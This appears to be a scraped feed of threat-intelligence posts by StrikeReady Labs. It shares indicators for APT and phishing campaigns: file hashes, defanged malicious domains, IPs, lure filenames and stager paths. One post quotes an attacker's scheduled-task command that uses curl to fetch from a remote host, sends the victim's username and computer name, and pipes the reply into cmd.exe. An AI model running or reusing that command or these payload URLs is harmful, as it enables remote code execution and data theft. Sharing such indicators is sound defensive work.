#apt #pk drive.usercontent[.]google[.]com/download?id=1FCv4gbtcpWYQo5GFVFRoMaJe0_YZVBk-&export=download&authuser=0
igkashmir8@gmail.com
Posts by StrikeReady Labs
this actor has sent an email like this to dozens of governments, every single day, for the past 15 years. it takes them a few weeks to get banned from outlook/gmail/yahoo/etc and they move to a new one #daily_notaphish_just_weird
interesting #susp #apt payload uploaded to VT
Work. zip uploaded from Saudi Arabia 85cd2aa498a943d4c07ce75d30f6e68d
decoy. if you like .net obfuscation, this is a nice one
#cn #apt
1.zip via vt (uploaded from myanmar, mongolian lure)
03ca0221a1d7e49b72692ba12405216d -> neurosurgeryx[.]com
decoy:
Are you flagging on .csproj files inside archives, being delivered by email?
This "JWT_SESSION" cookie sure looks funky, with base64 encoded data between "metaPrefix" and "metaSuffix"!
🔥 66.234.147.10:8080
#susp #dailyphish -> financeoperations1.github[.]io/ambulacecare/
#dailyphish targeting an insurance company ... a dinner invite leading to screenconnect.
subscribezoominfo.screenconnect[.]com/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
susp #redteam OSCE_Election_Security_Checklist_v2.pdf.exe
600710c6ad0e4260a3879d36c5455e71
66.234.147.10
#dprk #apt PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.zip
5c2857913efc6007b3ee7028a132baa4
#apt #bitter
Database server.rar 8cb6dee642f510d20825e49435e4f814
rar -> vhdx -> jse ->
"Maintenance\Windows10\Drivers\Graphics\VerifiedUpdaterTaskMachineGPU-X-5-93-12798962" /tr "conhost --headless cmd /c curl www.haburyohoteam[.]com/jvdmhawme.okjhvthfv?d=%username%_%computername% | cmd.exe"
not all #dailyphish are created equally
#dailyopendir #susp #redteam 172.178.44[.]139/stager/
#susp "destruction missile defense radars.pdf.exe" uploaded from qatar
1bc6281441096086b2357066d70f65e4
decoy
#susp #apt
Contact_Letter_To_Ms_Pech_ICB_Cambodia_On_Collaboration.pdf.exe
CN_Contact_Work_Cambodia's_Ministry_of_Public_Works_and_Transport.pdf
e3b51bdcb1b55cf7cb11ef4b3872776b
03e7a4065df354a99add76e8ba7dd37b
"big game" invoice scammers switching from training invoices to infosec #dailyphish
#apt
db1b11b63d631e2d0cebdefb322c2e7a
Letter to Indian Coast Guards by Def Secy.xlam
"pointless calculations"
info.updates-pbi.workers[.]dev
cert UA article on the below cert.gov.ua/article/6287...
4ad8d263065e46d0e2fd4183f89258ac
Weapons requirements for the Kuwait Air Force.lnk
3f25c60d96f9cbbca7fd19278545207b
دعوة للمشاركة.lnk
#susp #apt
Algerian Ukrainian proposals for cooperation. zip c73c308a137ff7805577042cc9e923e1
lnk: desktop-jm38b85
overlaps with phish against Mongolia
Хятад улстай хамтын ажиллагаагаа өргөжүүлэх төсөл.lnk
497c1ad79c4ef5425eb8a7e4f49efc8b
drops stealer that uses Mega for exfil
#apt
NATO Sanctions Package Against Russia - Belgium (February 2026)(.PDF).html
94b0039707efcd1821d4b34c13f65a75